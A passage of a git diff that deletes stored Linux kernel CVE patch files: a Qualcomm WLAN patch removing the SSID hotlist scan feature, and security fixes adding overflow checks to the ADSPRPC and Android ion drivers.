request->ssid_count = 0; -- -- context = &hdd_ctx->ext_scan_context; -- spin_lock(&hdd_context_lock); -- INIT_COMPLETION(context->response_event); -- context->request_id = request_id = request->request_id; -- spin_unlock(&hdd_context_lock); -- -- status = sme_set_ssid_hotlist(hdd_ctx->hHal, request); -- if (!HAL_STATUS_SUCCESS(status)) { -- hddLog(LOGE, -- FL("sme_reset_ssid_hotlist failed(err=%d)"), status); -- goto fail; -- } -- -- vos_mem_free(request); -- -- /* request was sent -- wait for the response */ -- rc = wait_for_completion_timeout(&context->response_event, -- msecs_to_jiffies -- (WLAN_WAIT_TIME_EXTSCAN)); -- if (!rc) { -- hddLog(LOGE, FL("sme_reset_ssid_hotlist timed out")); -- retval = -ETIMEDOUT; -- } else { -- spin_lock(&hdd_context_lock); -- if (context->request_id == request_id) -- retval = context->response_status; -- else -- retval = -EINVAL; -- spin_unlock(&hdd_context_lock); -- } -- -- return retval; -- --fail: -- vos_mem_free(request); -- return -EINVAL; --} -- --/** -- * wlan_hdd_cfg80211_extscan_reset_ssid_hotlist() - reset ssid hot list -- * @wiphy: Pointer to wireless phy -- * @wdev: 
Pointer to wireless device -- * @data: Pointer to data -- * @data_len: Data length -- * -- * Return: 0 on success, negative errno on failure -- */ --static int --wlan_hdd_cfg80211_extscan_reset_ssid_hotlist(struct wiphy *wiphy, -- struct wireless_dev *wdev, -- const void *data, -- int data_len) --{ -- int ret; -- -- vos_ssr_protect(__func__); -- ret = __wlan_hdd_cfg80211_extscan_reset_ssid_hotlist(wiphy, wdev, -- data, data_len); -- vos_ssr_unprotect(__func__); -- -- return ret; --} - /* - * done with short names for the global vendor params - * used by wlan_hdd_cfg80211_extscan_reset_ssid_hotlist() -@@ -13572,22 +13179,6 @@ const struct wiphy_vendor_command hdd_wiphy_vendor_commands[] = - WIPHY_VENDOR_CMD_NEED_RUNNING, - .doit = wlan_hdd_cfg80211_reset_passpoint_list - }, -- { -- .info.vendor_id = QCA_NL80211_VENDOR_ID, -- .info.subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST, -- .flags = WIPHY_VENDOR_CMD_NEED_WDEV | -- WIPHY_VENDOR_CMD_NEED_NETDEV | -- WIPHY_VENDOR_CMD_NEED_RUNNING, -- .doit = wlan_hdd_cfg80211_extscan_set_ssid_hotlist -- }, -- { -- .info.vendor_id = QCA_NL80211_VENDOR_ID, -- .info.subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST, -- .flags = WIPHY_VENDOR_CMD_NEED_WDEV | -- WIPHY_VENDOR_CMD_NEED_NETDEV | -- WIPHY_VENDOR_CMD_NEED_RUNNING, -- .doit = wlan_hdd_cfg80211_extscan_reset_ssid_hotlist -- }, - #endif /* FEATURE_WLAN_EXTSCAN */ - { - .info.vendor_id = QCA_NL80211_VENDOR_ID, -@@ -27596,152 +27187,6 @@ wlan_hdd_cfg80211_extscan_generic_rsp - } - - /** -- * wlan_hdd_cfg80211_extscan_hotlist_ssid_match_ind() - -- * Handle an SSID hotlist match event -- * @ctx: HDD context registered with SME -- * @event: The SSID hotlist match event -- * -- * This function will take an SSID match event that was generated by -- * firmware and will convert it into a cfg80211 vendor event which is -- * sent to userspace. -- * This callback execute in atomic context and must not invoke any -- * blocking calls. 
-- * -- * Return: none -- */ --static void --wlan_hdd_cfg80211_extscan_hotlist_ssid_match_ind(void *ctx, -- tpSirWifiScanResultEvent event) --{ -- hdd_context_t *hdd_ctx = ctx; -- struct sk_buff *skb; -- unsigned i; -- unsigned index; -- int flags = vos_get_gfp_flags(); -- -- ENTER(); -- -- if (wlan_hdd_validate_context(hdd_ctx)) -- return; -- -- if (!event) { -- hddLog(LOGE, -- FL("event is null")); -- return; -- } -- if (event->ap_found) { -- index = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND_INDEX; -- hddLog(LOG1, "SSID hotlist found"); -- } else { -- index = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST_INDEX; -- hddLog(LOG1, "SSID hotlist lost"); -- } -- -- skb = cfg80211_vendor_event_alloc(hdd_ctx->wiphy, -- NULL, -- EXTSCAN_EVENT_BUF_SIZE + NLMSG_HDRLEN, -- index, flags); -- -- if (!skb) { -- hddLog(LOGE, FL("cfg80211_vendor_event_alloc failed")); -- return; -- } -- hddLog(LOG1, "Req Id %u, Num results %u, More Data (%u)", -- event->requestId, event->numOfAps, event->moreData); -- -- for (i = 0; i < event->numOfAps; i++) { -- hddLog(LOG1, "[i=%d] Timestamp %llu " -- "Ssid: %s " -- "Bssid (" MAC_ADDRESS_STR ") " -- "Channel %u " -- "Rssi %d " -- "RTT %u " -- "RTT_SD %u", -- i, -- event->ap[i].ts, -- event->ap[i].ssid, -- MAC_ADDR_ARRAY(event->ap[i].bssid), -- event->ap[i].channel, -- event->ap[i].rssi, -- event->ap[i].rtt, -- event->ap[i].rtt_sd); -- } -- -- if (nla_put_u32(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_REQUEST_ID, -- event->requestId) || -- nla_put_u32(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_NUM_RESULTS_AVAILABLE, -- event->numOfAps)) { -- hddLog(LOGE, FL("put fail")); -- goto fail; -- } -- -- if (event->numOfAps) { -- struct nlattr *aps; -- aps = nla_nest_start(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_LIST); -- if (!aps) { -- hddLog(LOGE, FL("nest fail")); -- goto fail; -- } -- -- for (i = 0; i < event->numOfAps; i++) { -- struct nlattr *ap; -- -- ap = nla_nest_start(skb, i); -- if (!ap) { -- hddLog(LOGE, FL("nest fail")); -- 
goto fail; -- } -- -- if (nla_put_u64(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_TIME_STAMP, -- event->ap[i].ts) || -- nla_put(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_SSID, -- sizeof(event->ap[i].ssid), -- event->ap[i].ssid) || -- nla_put(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_BSSID, -- sizeof(event->ap[i].bssid), -- event->ap[i].bssid) || -- nla_put_u32(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_CHANNEL, -- event->ap[i].channel) || -- nla_put_s32(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_RSSI, -- event->ap[i].rssi) || -- nla_put_u32(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_RTT, -- event->ap[i].rtt) || -- nla_put_u32(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_RTT_SD, -- event->ap[i].rtt_sd)) { -- hddLog(LOGE, FL("put fail")); -- goto fail; -- } -- nla_nest_end(skb, ap); -- } -- nla_nest_end(skb, aps); -- -- if (nla_put_u8(skb, -- QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_MORE_DATA, -- event->moreData)) { -- hddLog(LOGE, FL("put fail")); -- goto fail; -- } -- } -- -- cfg80211_vendor_event(skb, flags); -- return; -- --fail: -- kfree_skb(skb); -- return; --} -- --/** - * wlan_hdd_cfg80211_extscan_signif_wifi_change_results_ind() - results callback - * @hddctx: HDD context - * @data: event data -@@ -28462,11 +27907,6 @@ void wlan_hdd_cfg80211_extscan_callback(void *ctx, const tANI_U16 evType, - wlan_hdd_cfg80211_extscan_generic_rsp(ctx, pMsg); - break; - -- case eSIR_EXTSCAN_HOTLIST_SSID_MATCH_IND: -- wlan_hdd_cfg80211_extscan_hotlist_ssid_match_ind(ctx, -- (tpSirWifiScanResultEvent)pMsg); -- break; -- - default: - hddLog(LOGE, FL("Unknown event type %u"), evType); - break; -diff --git a/CORE/MAC/inc/sirApi.h b/CORE/MAC/inc/sirApi.h -index 605e9c6..a2ac0b3 100644 ---- a/CORE/MAC/inc/sirApi.h -+++ b/CORE/MAC/inc/sirApi.h -@@ -99,7 +99,6 @@ typedef tANI_U8 tSirVersionString[SIR_VERSION_STRING_LEN]; - #define WLAN_EXTSCAN_MAX_BUCKETS 16 - #define 
WLAN_EXTSCAN_MAX_HOTLIST_APS 128 - #define WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS 64 --#define WLAN_EXTSCAN_MAX_HOTLIST_SSIDS 8 - - #define NUM_CHAINS_MAX 2 - -@@ -133,7 +132,6 @@ typedef enum - eSIR_PASSPOINT_NETWORK_FOUND_IND, - eSIR_EXTSCAN_SET_SSID_HOTLIST_RSP, - eSIR_EXTSCAN_RESET_SSID_HOTLIST_RSP, -- eSIR_EXTSCAN_HOTLIST_SSID_MATCH_IND, - - /* Keep this last */ - eSIR_EXTSCAN_CALLBACK_TYPE_MAX, -@@ -5639,37 +5637,6 @@ typedef struct - } tSirExtScanResetBssidHotlistReqParams, - *tpSirExtScanResetBssidHotlistReqParams; - --/** -- * struct sir_ssid_hotlist_param - param for SSID Hotlist -- * @ssid: SSID which is being hotlisted -- * @band: Band in which the given SSID should be scanned -- * @rssi_low: Low bound on RSSI -- * @rssi_high: High bound on RSSI -- */ --struct sir_ssid_hotlist_param { -- tSirMacSSid ssid; -- uint8_t band; -- int32_t rssi_low; -- int32_t rssi_high; --}; -- --/** -- * struct sir_set_ssid_hotlist_request - set SSID hotlist request struct -- * @request_id: ID of the request -- * @session_id: ID of the session -- * @lost_ssid_sample_size: Number of consecutive scans in which the SSID -- * must not be seen in order to consider the SSID "lost" -- * @ssid_count: Number of valid entries in the @ssids array -- * @ssids: Array that defines the SSIDs that are in the hotlist -- */ --struct sir_set_ssid_hotlist_request { -- uint32_t request_id; -- uint8_t session_id; -- uint32_t lost_ssid_sample_size; -- uint32_t ssid_count; -- struct sir_ssid_hotlist_param ssids[WLAN_EXTSCAN_MAX_HOTLIST_SSIDS]; --}; -- - typedef struct - { - tANI_U32 requestId; -diff --git a/CORE/MAC/src/include/sirParams.h b/CORE/MAC/src/include/sirParams.h -index c6c8648..fbaad99 100644 ---- a/CORE/MAC/src/include/sirParams.h -+++ b/CORE/MAC/src/include/sirParams.h -@@ -725,7 +725,7 @@ typedef struct sSirMbMsgP2p - #define SIR_HAL_CONFIG_GUARD_TIME (SIR_HAL_ITC_MSG_TYPES_BEGIN + 315) - #define SIR_HAL_SET_PASSPOINT_LIST_REQ (SIR_HAL_ITC_MSG_TYPES_BEGIN + 316) - #define 
SIR_HAL_RESET_PASSPOINT_LIST_REQ (SIR_HAL_ITC_MSG_TYPES_BEGIN + 317) --#define SIR_HAL_EXTSCAN_SET_SSID_HOTLIST_REQ (SIR_HAL_ITC_MSG_TYPES_BEGIN + 318) -+/* 318 unused */ - - #define SIR_HAL_OCB_SET_CONFIG_CMD (SIR_HAL_ITC_MSG_TYPES_BEGIN + 319) - #define SIR_HAL_OCB_SET_UTC_TIME_CMD (SIR_HAL_ITC_MSG_TYPES_BEGIN + 320) -diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c -index 4acc943..df2ae90 100644 ---- a/CORE/SERVICES/WMA/wma.c -+++ b/CORE/SERVICES/WMA/wma.c -@@ -4438,102 +4438,6 @@ static int wma_passpoint_match_event_handler(void *handle, - return 0; - } - --/** -- * wma_extscan_hotlist_ssid_match_event_handler() - -- * Handler for SSID hotlist match event from firmware -- * @handle: WMA handle -- * @cmd_param_info: WMI command buffer -- * @len: length of @cmd_param_info -- * -- * Return: 0 on success, non-zero on failure -- */ --static int --wma_extscan_hotlist_ssid_match_event_handler(void *handle, -- uint8_t *cmd_param_info, -- uint32_t len) --{ -- tp_wma_handle wma = (tp_wma_handle) handle; -- WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID_param_tlvs *param_buf; -- wmi_extscan_hotlist_ssid_match_event_fixed_param *event; -- tSirWifiScanResultEvent *dest_hotlist; -- tSirWifiScanResult *dest_ap; -- wmi_extscan_wlan_descriptor *src_hotlist; -- int numap, j; -- bool ssid_found = false; -- tpAniSirGlobal mac = -- vos_get_context(VOS_MODULE_ID_PE, wma->vos_context); -- -- if (!mac) { -- WMA_LOGE("%s: Invalid mac", __func__); -- return -EINVAL; -- } -- -- if (!mac->sme.pExtScanIndCb) { -- WMA_LOGE("%s: Callback not registered", __func__); -- return -EINVAL; -- } -- -- param_buf = (WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID_param_tlvs *) -- cmd_param_info; -- if (!param_buf) { -- WMA_LOGE("%s: Invalid hotlist match event", __func__); -- return -EINVAL; -- } -- -- event = param_buf->fixed_param; -- src_hotlist = param_buf->hotlist_ssid_match; -- numap = event->total_entries; -- if (!src_hotlist || !numap) { -- WMA_LOGE("%s: Hotlist AP's list invalid", __func__); -- 
return -EINVAL; -- } -- -- dest_hotlist = vos_mem_malloc(sizeof(*dest_hotlist) + -- sizeof(*dest_ap) * numap); -- if (!dest_hotlist) { -- WMA_LOGE("%s: Allocation failed for hotlist buffer", __func__); -- return -EINVAL; -- } -- -- dest_ap = &dest_hotlist->ap[0]; -- dest_hotlist->numOfAps = event->total_entries; -- dest_hotlist->requestId = event->config_request_id; -- -- if (event->first_entry_index + -- event->num_entries_in_page < event->total_entries) -- dest_hotlist->moreData = 1; -- else -- dest_hotlist->moreData = 0; -- -- WMA_LOGD("%s: Hotlist match: requestId: %u, numOfAps: %d", __func__, -- dest_hotlist->requestId, dest_hotlist->numOfAps); -- -- for (j = 0; j < numap; j++) { -- dest_ap->channel = src_hotlist->channel; -- dest_ap->ts = src_hotlist->tstamp; -- ssid_found = src_hotlist->flags & WMI_HOTLIST_FLAG_PRESENCE; -- dest_ap->rtt = src_hotlist->rtt; -- dest_ap->rtt_sd = src_hotlist->rtt_sd; -- dest_ap->beaconPeriod = src_hotlist->beacon_interval; -- dest_ap->capability = src_hotlist->capabilities; -- dest_ap->ieLength = src_hotlist-> ie_length; -- WMI_MAC_ADDR_TO_CHAR_ARRAY(&src_hotlist->bssid, -- dest_ap->bssid); -- vos_mem_copy(dest_ap->ssid, src_hotlist->ssid.ssid, -- src_hotlist->ssid.ssid_len); -- dest_ap->ssid[src_hotlist->ssid.ssid_len] = '\0'; -- dest_ap++; -- src_hotlist++; -- } -- -- dest_hotlist->ap_found = ssid_found; -- mac->sme.pExtScanIndCb(mac->hHdd, -- eSIR_EXTSCAN_HOTLIST_SSID_MATCH_IND, -- dest_hotlist); -- WMA_LOGD("%s: sending hotlist ssid match event", __func__); -- vos_mem_free(dest_hotlist); -- return 0; --} - #endif - - #ifdef WLAN_FEATURE_LINK_LAYER_STATS -@@ -8079,10 +7983,6 @@ wma_register_extscan_event_handler(tp_wma_handle wma_handle) - WMI_PASSPOINT_MATCH_EVENTID, - wma_passpoint_match_event_handler); - -- wmi_unified_register_event_handler(wma_handle->wmi_handle, -- WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID, -- wma_extscan_hotlist_ssid_match_event_handler); -- - return; - - } -@@ -21915,10 +21815,6 @@ static int 
wma_extscan_get_eventid_from_tlvtag(uint32_t tag) - event_id = WMI_EXTSCAN_CAPABILITIES_EVENTID; - break; - -- case WMITLV_TAG_STRUC_wmi_extscan_hotlist_ssid_match_event_fixed_param: -- event_id = WMI_EXTSCAN_HOTLIST_SSID_MATCH_EVENTID; -- break; -- - default: - event_id = 0; - WMA_LOGE("%s: Unknown tag: %d", __func__, tag); -@@ -22003,11 +21899,6 @@ static void wma_extscan_wow_event_callback(void *handle, void *event, - wmi_cmd_struct_ptr, len); - break; - -- case WMITLV_TAG_STRUC_wmi_extscan_hotlist_ssid_match_event_fixed_param: -- wma_extscan_hotlist_ssid_match_event_handler(handle, -- wmi_cmd_struct_ptr, len); -- break; -- - default: - WMA_LOGE("%s: Unknown tag: %d", __func__, tag); - break; -@@ -28903,111 +28794,6 @@ VOS_STATUS wma_extscan_stop_hotlist_monitor(tp_wma_handle wma, - return VOS_STATUS_SUCCESS; - } - --/** -- * wma_set_ssid_hotlist() - Handle an SSID hotlist set request -- * @wma: WMA handle -- * @request: SSID hotlist set request from SME -- * -- * Return: VOS_STATUS -- */ --static VOS_STATUS --wma_set_ssid_hotlist(tp_wma_handle wma, -- struct sir_set_ssid_hotlist_request *request) --{ -- wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param *cmd; -- wmi_buf_t wmi_buf; -- uint32_t len; -- uint32_t array_size; -- uint8_t *buf_ptr; -- -- if (!wma || !wma->wmi_handle) { -- WMA_LOGE("%s: WMA is closed, can not issue hotlist cmd", -- __func__); -- return VOS_STATUS_E_INVAL; -- } -- if (!request) { -- WMA_LOGE("%s: Invalid request buffer", -- __func__); -- return VOS_STATUS_E_INVAL; -- } -- if (!WMI_SERVICE_IS_ENABLED(wma->wmi_service_bitmap, -- WMI_SERVICE_EXTSCAN)) { -- WMA_LOGE("%s: extscan not enabled", -- __func__); -- return VOS_STATUS_E_FAILURE; -- } -- -- /* length of fixed portion */ -- len = sizeof(*cmd); -- -- /* length of variable portion */ -- array_size = -- request->ssid_count * sizeof(wmi_extscan_hotlist_ssid_entry); -- len += WMI_TLV_HDR_SIZE + array_size; -- -- wmi_buf = wmi_buf_alloc(wma->wmi_handle, len); -- if (!wmi_buf) { -- 
WMA_LOGE("%s: wmi_buf_alloc failed", __func__); -- return VOS_STATUS_E_NOMEM; -- } -- -- buf_ptr = (uint8_t *) wmi_buf_data(wmi_buf); -- cmd = (wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param *) -- buf_ptr; -- WMITLV_SET_HDR -- (&cmd->tlv_header, -- WMITLV_TAG_STRUC_wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param, -- WMITLV_GET_STRUCT_TLVLEN -- (wmi_extscan_configure_hotlist_ssid_monitor_cmd_fixed_param)); -- -- cmd->request_id = request->request_id; -- cmd->requestor_id = 0; -- cmd->vdev_id = request->session_id; -- cmd->table_id = 0; -- cmd->lost_ap_scan_count = request->lost_ssid_sample_size; -- cmd->total_entries = request->ssid_count; -- cmd->num_entries_in_page = request->ssid_count; -- cmd->first_entry_index = 0; -- -- buf_ptr += sizeof(*cmd); -- WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC, array_size); -- -- if (request->ssid_count) { -- wmi_extscan_hotlist_ssid_entry *entry; -- int i; -- -- buf_ptr += WMI_TLV_HDR_SIZE; -- entry = (wmi_extscan_hotlist_ssid_entry *)buf_ptr; -- for (i = 0; i < request->ssid_count; i++) { -- WMITLV_SET_HDR -- (entry, -- WMITLV_TAG_ARRAY_STRUC, -- WMITLV_GET_STRUCT_TLVLEN -- (wmi_extscan_hotlist_ssid_entry)); -- entry->ssid.ssid_len = request->ssids[i].ssid.length; -- vos_mem_copy(entry->ssid.ssid, -- request->ssids[i].ssid.ssId, -- request->ssids[i].ssid.length); -- entry->band = request->ssids[i].band; -- entry->min_rssi = request->ssids[i].rssi_low; -- entry->max_rssi = request->ssids[i].rssi_high; -- entry++; -- } -- cmd->mode = WMI_EXTSCAN_MODE_START; -- } else { -- cmd->mode = WMI_EXTSCAN_MODE_STOP; -- } -- -- if (wmi_unified_cmd_send -- (wma->wmi_handle, wmi_buf, len, -- WMI_EXTSCAN_CONFIGURE_HOTLIST_SSID_MONITOR_CMDID)) { -- WMA_LOGE("%s: failed to send command", __func__); -- wmi_buf_free(wmi_buf); -- return VOS_STATUS_E_FAILURE; -- } -- return VOS_STATUS_SUCCESS; --} -- - VOS_STATUS wma_get_buf_extscan_change_monitor_cmd(tp_wma_handle wma_handle, - tSirExtScanSetSigChangeReqParams *psigchange, 
- wmi_buf_t *buf, int *buf_len) -@@ -32598,11 +32384,6 @@ VOS_STATUS wma_mc_process_msg(v_VOID_t *vos_context, vos_msg_t *msg) - (tSirExtScanResetBssidHotlistReqParams *)msg->bodyptr); - vos_mem_free(msg->bodyptr); - break; -- case WDA_EXTSCAN_SET_SSID_HOTLIST_REQ: -- wma_set_ssid_hotlist(wma_handle, -- (struct sir_set_ssid_hotlist_request *)msg->bodyptr); -- vos_mem_free(msg->bodyptr); -- break; - case WDA_EXTSCAN_SET_SIGNF_CHANGE_REQ: - wma_extscan_start_change_monitor(wma_handle, - (tSirExtScanSetSigChangeReqParams *)msg->bodyptr); -diff --git a/CORE/SME/inc/sme_Api.h b/CORE/SME/inc/sme_Api.h -index 3a08cb5..0834e5b 100644 ---- a/CORE/SME/inc/sme_Api.h -+++ b/CORE/SME/inc/sme_Api.h -@@ -4137,10 +4137,6 @@ eHalStatus sme_SetBssHotlist (tHalHandle hHal, - eHalStatus sme_ResetBssHotlist (tHalHandle hHal, - tSirExtScanResetBssidHotlistReqParams *pResetReq); - --eHalStatus --sme_set_ssid_hotlist(tHalHandle hal, -- struct sir_set_ssid_hotlist_request *request); -- - /* --------------------------------------------------------------------------- - \fn sme_SetSignificantChange - \brief SME API to set significant change -diff --git a/CORE/SME/src/sme_common/sme_Api.c b/CORE/SME/src/sme_common/sme_Api.c -index 4db2b3f..cb1a588 100644 ---- a/CORE/SME/src/sme_common/sme_Api.c -+++ b/CORE/SME/src/sme_common/sme_Api.c -@@ -15966,52 +15966,6 @@ eHalStatus sme_ResetBssHotlist (tHalHandle hHal, - return status; - } - --/** -- * sme_set_ssid_hotlist() - Set the SSID hotlist -- * @hal: SME handle -- * @request: set ssid hotlist request -- * -- * Return: eHalStatus -- */ --eHalStatus --sme_set_ssid_hotlist(tHalHandle hal, -- struct sir_set_ssid_hotlist_request *request) --{ -- eHalStatus status; -- VOS_STATUS vstatus; -- tpAniSirGlobal mac = PMAC_STRUCT(hal); -- vos_msg_t vos_message; -- struct sir_set_ssid_hotlist_request *set_req; -- -- set_req = vos_mem_malloc(sizeof(*set_req)); -- if (!set_req) { -- VOS_TRACE(VOS_MODULE_ID_SME, VOS_TRACE_LEVEL_ERROR, -- "%s: Not able to allocate 
memory for WDA_EXTSCAN_SET_SSID_HOTLIST_REQ", -- __func__); -- return eHAL_STATUS_FAILURE; -- } -- -- *set_req = *request; -- status = sme_AcquireGlobalLock(&mac->sme); -- if (eHAL_STATUS_SUCCESS == status) { -- /* Serialize the req through MC thread */ -- vos_message.bodyptr = set_req; -- vos_message.type = WDA_EXTSCAN_SET_SSID_HOTLIST_REQ; -- vstatus = vos_mq_post_message(VOS_MQ_ID_WDA, &vos_message); -- sme_ReleaseGlobalLock(&mac->sme); -- if (!VOS_IS_STATUS_SUCCESS(vstatus)) { -- vos_mem_free(set_req); -- status = eHAL_STATUS_FAILURE; -- } -- } else { -- VOS_TRACE(VOS_MODULE_ID_SME, VOS_TRACE_LEVEL_ERROR, -- "%s: sme_AcquireGlobalLock error", __func__); -- vos_mem_free(set_req); -- status = eHAL_STATUS_FAILURE; -- } -- return status; --} -- - /* --------------------------------------------------------------------------- - \fn sme_SetSignificantChange - \brief SME API to set significant change -diff --git a/CORE/SYS/legacy/src/utils/src/macTrace.c b/CORE/SYS/legacy/src/utils/src/macTrace.c -index 8a27363..110376f 100644 ---- a/CORE/SYS/legacy/src/utils/src/macTrace.c -+++ b/CORE/SYS/legacy/src/utils/src/macTrace.c -@@ -952,7 +952,6 @@ tANI_U8* macTraceGetWdaMsgString(tANI_U16 wdaMsg) - CASE_RETURN_STRING(WDA_EXTSCAN_STOP_REQ); - CASE_RETURN_STRING(WDA_EXTSCAN_SET_BSSID_HOTLIST_REQ); - CASE_RETURN_STRING(WDA_EXTSCAN_RESET_BSSID_HOTLIST_REQ); -- CASE_RETURN_STRING(WDA_EXTSCAN_SET_SSID_HOTLIST_REQ); - CASE_RETURN_STRING(WDA_EXTSCAN_SET_SIGNF_CHANGE_REQ); - CASE_RETURN_STRING(WDA_EXTSCAN_RESET_SIGNF_CHANGE_REQ); - CASE_RETURN_STRING(WDA_EXTSCAN_GET_CACHED_RESULTS_REQ); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0465/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0465/ANY/0001.patch deleted file mode 100644 index cd94e134..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0465/ANY/0001.patch +++ /dev/null 
@@ -1,68 +0,0 @@
-From 3823f0f8d0bbbbd675a42a54691f4051b3c7e544 Mon Sep 17 00:00:00 2001
-From: Sathish Ambley
-Date: Wed, 25 Jan 2017 10:51:55 -0800
-Subject: msm: ADSPRPC: Check for buffer overflow condition
-
-The buffer length that is being passed could result in overflow
-condition causing invalid memory to be accessed.
-
-Change-Id: I3e23f31b8cb61f8e77d09a39fab4a2d4c222cf25
-Signed-off-by: Sathish Ambley
----
- drivers/char/adsprpc.c | 18 ++++++++++++++----
- 1 file changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index 95dca75..b8be20c 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -805,9 +805,9 @@ static int overlap_ptr_cmp(const void *a, const void *b)
- return st == 0 ? ed : st;
- }
-
--static void context_build_overlap(struct smq_invoke_ctx *ctx)
-+static int context_build_overlap(struct smq_invoke_ctx *ctx)
- {
-- int i;
-+ int i, err = 0;
- remote_arg_t *lpra = ctx->lpra;
- int inbufs = REMOTE_SCALARS_INBUFS(ctx->sc);
- int outbufs = REMOTE_SCALARS_OUTBUFS(ctx->sc);
-@@ -816,6 +816,11 @@ static void context_build_overlap(struct smq_invoke_ctx *ctx)
- for (i = 0; i < nbufs; ++i) {
- ctx->overs[i].start = (uintptr_t)lpra[i].buf.pv;
- ctx->overs[i].end = ctx->overs[i].start + lpra[i].buf.len;
-+ if (lpra[i].buf.len) {
-+ VERIFY(err, ctx->overs[i].end > ctx->overs[i].start);
-+ if (err)
-+ goto bail;
-+ }
- ctx->overs[i].raix = i;
- ctx->overps[i] = &ctx->overs[i];
- }
-@@ -841,6 +846,8 @@ static void context_build_overlap(struct smq_invoke_ctx *ctx)
- max = *ctx->overps[i];
- }
- }
-+bail:
-+ return err;
- }
-
- #define K_COPY_FROM_USER(err, kernel, dst, src, size) \
-@@ -913,8 +920,11 @@ static int context_alloc(struct fastrpc_file *fl, uint32_t kernel,
- }
-
- ctx->sc = invoke->sc;
-- if (bufs)
-- context_build_overlap(ctx);
-+ if (bufs) {
-+ VERIFY(err, 0 == context_build_overlap(ctx));
-+ if (err)
-+ goto bail;
-+ }
- ctx->retval = -1;
- ctx->pid = current->pid;
- ctx->tgid = current->tgid;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0507/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0507/ANY/0001.patch
deleted file mode 100644
index 3c43eb3c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0507/ANY/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 03c26a1d8c8687131da151c2e4bd5a04d08e0dec Mon Sep 17 00:00:00 2001
-From: Ariel Yin
-Date: Fri, 13 Jan 2017 15:05:54 -0800
-Subject: [PATCH] ANDROID: ion: check for kref overflow
-
-Userspace can cause the kref to handles to increment
-arbitrarily high. Ensure it does not overflow.
-
-Signed-off-by: Daniel Rosenberg
-
-Bug: 31992382
-Test: See bug for poc
-Change-Id: I6bff1df385742b1d836d43180dc87fadcea80782
----
- drivers/staging/android/ion/ion.c | 17 ++++++++++++++---
- 1 file changed, 14 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-index cc1b3bff392ac..48b6b86a61945 100644
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -16,6 +16,8 @@
- *
- */
-
-+#include
-+#include
- #include
- #include
- #include
-@@ -400,6 +402,15 @@ static void ion_handle_get(struct ion_handle *handle)
- kref_get(&handle->ref);
- }
-
-+/* Must hold the client lock */
-+static struct ion_handle* ion_handle_get_check_overflow(struct ion_handle *handle)
-+{
-+ if (atomic_read(&handle->ref.refcount) + 1 == 0)
-+ return ERR_PTR(-EOVERFLOW);
-+ ion_handle_get(handle);
-+ return handle;
-+}
-+
- int ion_handle_put_nolock(struct ion_handle *handle)
- {
- int ret;
-@@ -445,9 +456,9 @@ struct ion_handle *ion_handle_get_by_id_nolock(struct ion_client *client,
-
- handle = idr_find(&client->idr, id);
- if (handle)
-- ion_handle_get(handle);
-+ return ion_handle_get_check_overflow(handle);
-
-- return handle ? handle : ERR_PTR(-EINVAL);
-+ return ERR_PTR(-EINVAL);
- }
-
- struct ion_handle *ion_handle_get_by_id(struct ion_client *client,
-@@ -1339,7 +1350,7 @@ struct ion_handle *ion_import_dma_buf(struct ion_client *client, int fd)
- /* if a handle exists for this buffer just take a reference to it */
- handle = ion_handle_lookup(client, buffer);
- if (!IS_ERR(handle)) {
-- ion_handle_get(handle);
-+ handle = ion_handle_get_check_overflow(handle);
- mutex_unlock(&client->lock);
- goto end;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-0509/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0509/ANY/0001.patch
deleted file mode 100644
index a14fce76..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0509/ANY/0001.patch
+++ /dev/null
